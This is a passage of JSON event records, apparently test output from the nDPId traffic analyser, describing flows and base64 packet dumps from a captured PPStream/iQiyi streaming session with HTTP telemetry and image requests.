L+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM
8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} -02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRy
gtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIV
FRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} +01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh
4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hl
Ufxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} +02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0c
jf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} +00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 